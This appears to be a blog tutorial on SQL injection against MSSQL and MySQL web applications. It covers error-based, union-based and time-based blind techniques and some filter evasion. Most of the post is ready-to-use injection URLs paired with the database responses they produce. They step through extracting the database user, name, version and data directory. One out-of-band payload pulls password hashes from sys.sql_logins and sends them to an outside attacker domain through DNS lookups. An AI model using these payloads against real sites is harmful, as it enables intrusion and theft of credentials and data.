Sql Injection


======================
Intro to SQL INJECTION
======================

* Classes of SQLI
-----------------

SQL Injection can be broken up into 3 classes

1. Inband - data is extracted using the same channel that is used to inject the SQL code.
This is the most straightforward kind of attack, in which the retrieved data is presented
directly in the application web page

2. Out-of-Band - data is retrieved using a different channel (e.g.: an email with the results of
the query is generated and sent to the tester)


3.Inferential - there is no actual transfer of data, but the tester is able to reconstruct the
information by sending particular requests and observing the resulting behaviour of the
website/DB Server.

Inband:
-------
Data is extracted using the same channel that is used to inject the SQL code.

This is the most straightforward kind of attack, in which the retrieved data is presented directly in the application web page

So this is our Error-Based, and Union-Based SQL Injections

http://[site]/page.asp?id=1 or 1=convert(int,(USER))--

Syntax error converting the nvarchar value '[j0e]' to a column of data type int.

Database Says : Hey Dude!!! you are converting nvarchar value '[j0e]' to a column of data type int are you Idiot.

Out of band:
------------
Data is retrieved using a different channel (e.g.: an email with the results of the query is generated and sent to the tester).
This is another way of getting the data out of the server (such as http, or dns).

http://[site]/page.asp?id=1;declare @host varchar(800); select @host = name + '-' +master.sys.fn_varbintohexstr(password_hash) + '.2.pwn3dbyj0e.com' from
sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');--

Inferential:
------------
If the application returns an error message generated by an incorrect query,then it is easy to reconstruct the logic of the original query and therefore
understand how to perform the injection correctly. However, if the application hides the error details, then the tester must be
able to reverse engineer the logic of the original query. The latter case is known as "Blind SQL Injection".

http://[site]/page.asp?id=1;if+not(select+system_user)+<>+'sa'+waitfor+delay+'0:0:10'--

Ask it if it's running as 'sa'

What About Tools????
--------------------

Automated tools are a great way to identify SQLI......
Yeah they are......just be conscious of the different SQL Injection Types....
SQL Vuln Scanners
So let's start with some tools you can use to identify SQLI as well as
the type they generally identify.

mieliekoek.pl------->(error based)
wpoison------------->(error based)
sqlmap-------------->(blind by default, and union if you specify)
wapiti-------------->(error based)
w3af---------------->(error, blind)
paros--------------->(error, blind)
sqid --------------->(error)


SQL Injection Types
-------------------
1. Error-Based SQL Injection
2. Union-Based SQL Injection
3. Blind SQL Injection

Error: Asking the DB a question that will cause an error, and gleening information from the error.

Union: The SQL UNION is used to combine the results of two or more SELECT SQL statements into a single result. Really useful for SQL Injection :)

Blind: Asking the DB a true/false question and using whether valid page returned or not, or by using the time it took for your valid page to return
as the answer to the question.

Methodology for how to test for SQL Injection
---------------------------------------------

Identify
--------

Identify Injection point (Tool or Manual)
Determine Injection Type (Integer or String)

Attack
------
Error-Based SQL Injection (geeling Error contructing our query based on errors)

Union-Based SQL Injection (Great for data extraction)

Blind SQL Injection (Worst case....last resort)


Determine the Injection Type
----------------------------

Is it integer or string based?

1. Integer Injection:
http://[site]/page.asp?id=1 having 1=1--

Column '[COLUMN NAME]' is invalid in the select list because it is not
contained in an aggregate function and there is no GROUP BY clause.

String Injection:

http://[site]/page.asp?id=x' having 1=1--

Column '[COLUMN NAME]' is invalid in the select list because it is not
contained in an aggregate function and there is no GROUP BY clause.

Determining this is what determines if you need a ' or not. if Interger based then not ' (tik) if String based then i require ' (tik)


Error-Based SQL Injection Syntax for extracting the USER
--------------------------------------------------------

http://[site]/page asp?id=1 or 1=convert(int (USER))--

Syntax error converting the nvarchar value '[DB USER]' to a column of data type int.

Grab the database user with USER

Grab the database name with DB_NAME

Grab the servername with @@servername

Grab the Windows/OS version with @@version

Union-Based SQL Injection Syntax for extracting the USER
---------------------------------------------------------

http://[site]/page.asp?id=1 UNION SELECT ALL 1--

All queries in an SQL statement containing a UNION operator must have an equal number of
expressions in their target lists.

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2--
All queries in an SQL statement containing a UNION operator must have an equal number of
expressions in their target lists.


http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3--
All queries in an SQL statement containing a UNION operator must have an equal number of
expressions in their target lists.

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3,4--

NO ERROR
http://[site]/page.asp?id=null UNION SELECT ALL 1,USER,3,4--

Blind SQL Injection Syntax for extracting the USER
---------------------------------------------------
3 - Total Characters DBO for Example

http://[site]/page.asp?id=1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
Valid page returns immediately

http://[site]/page.asp?id=1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
Valid page returns immediately

http://[site]/page asp?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'--
Valid page returns after 10 second delay




Blind SQL Injection Syntax for extracting the USER
--------------------------------------------------

Letz go to Linux shell type man ascii use it enumerate User name

D - 1st Character ascii value for D in ascii chart

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))>97) WAITFOR DELAY '00:00:10'
Valid page returns immediately

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
Valid page returns immediately

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
Valid page returns immediately

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'--
Valid page returns after 10 second delay


B - 2nd Character

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'--
Valid page returns immediately

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds)
Valid page returns after 10 second delay


O - 3rd Character

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'--
Valid page returns immediately

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>98) WAITFOR DELAY '00:00:10'--
Valid page returns immediately
.....and so on

http://[site]/page asp?id=1; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'--
Valid page returns after 10 second delay

Database User = DBO

MySQL
-----
With MySQL you will typically use union or true/false blind SQL Injection so
you really need to know a lot about the DB you are attacking such as:
* number of columns
* column names
* path to website

So you will need to enumerate this information first. The UNION operator is used to combine the result-set of two or more SELECT statements. Notice that each SELECT statement within the UNION must have the same number of columns. The columns must also have similar data types. Also, the columns in each SELECT statement must be in the same order.

Column number enumeration
-------------------------
http://[site]/page.php?id=1 order by 10/* <-- gives Unknown column ‘10' in 'order clause'

http://[site]/page.php?id=1 order by 5/* <-- gives a valid page

http://[site]/page.php?id=1 order by 6/* <-- gives Unknown column '6' in 'order clause'

So now we know there are 5 columns. By the way you can do this with MSSQL as well.


Building the union
------------------
http://[site]/page.php?id=1 union all select 1,2,3,4,5/* <-- gives a valid page Change the first part of the query to a null or negative value so we can see
what field will echo data back to us.
http://[site]/page.php?id=-1 union all select 1,2,3,4,5/* <-- gives a valid page but with the number 2, and 3 on it

or

http://[site]/page.php?id=null union all select 1,2,3,4,5/* <-- gives a valid page but with the number 2, and 3 on it Now we know that column numbers 2 and 3 will echo data back to us.
http://[site]/page.php?id=null union all select 1,2,user(),4,5,@@version,7/* --> asking DB to pass user and version of mysql db from vunerable column


Information Gathering using mysql inject
--------------------------------------

http://[site]/page.php?id=null union all select 1,user(),3,4,5/*

http://[site]/page.php?id=null union all select 1,2,database(),4,5/*

http://[site]/page.php?id=null union all select 1,@@version,@@datadir,4,5/*

Grab the database user with user()

Grab the database name with database()

Grab the database version with @@version

Grab the database data directory with @@datadir



Filter Evasion for sql inject
-----------------------------

I know that people often think this stuff is very black and white, cut and dry - but the simple truth with sql injection is sometimes you just have a gut feeling that you are looking at a vulnerable page.

You've tried a bunch of things but for some reason nothing seems to be working. You may be facing some sort of filtering. Maybe the developer has attempted to stop sql injection by only allowing alphanumeric characters as input

1. Client-Side Filtering
The first thing that we want to do is determine if the filtering is client-side (ex: being done with javascript).View source code and look for any parameters being passed to the website that may be filtered with javascript/vbscript and remove them is Bad Bad Bad it is prone to replay attacks

Hey developer's asking a simple question you are going to put all web app security on hackers laptop is that pass a common sense test.. if you use only Client-Side Filtering

- Save the page locally and remove offending javascript/vbscript
or
- Use a local proxy (ex: Paros, Webscarab, Burp Suite)

Restrictive Blacklist
---------------------
Server-side Alphanumeric Filter
http://[site]/page asp?id=2 or 1 like 1

Here we are doing an “or true,” although this time we are using the “like” comparison instead of the “=” sign. We can use this same technique for the other
variants such as “and 1 like 1” or “and 1 like 2”
http://[site]/page.asp?id=2 and 1 like 1
http://[site]/page.asp?id=2 and 1 like 2

No comments:

Post a Comment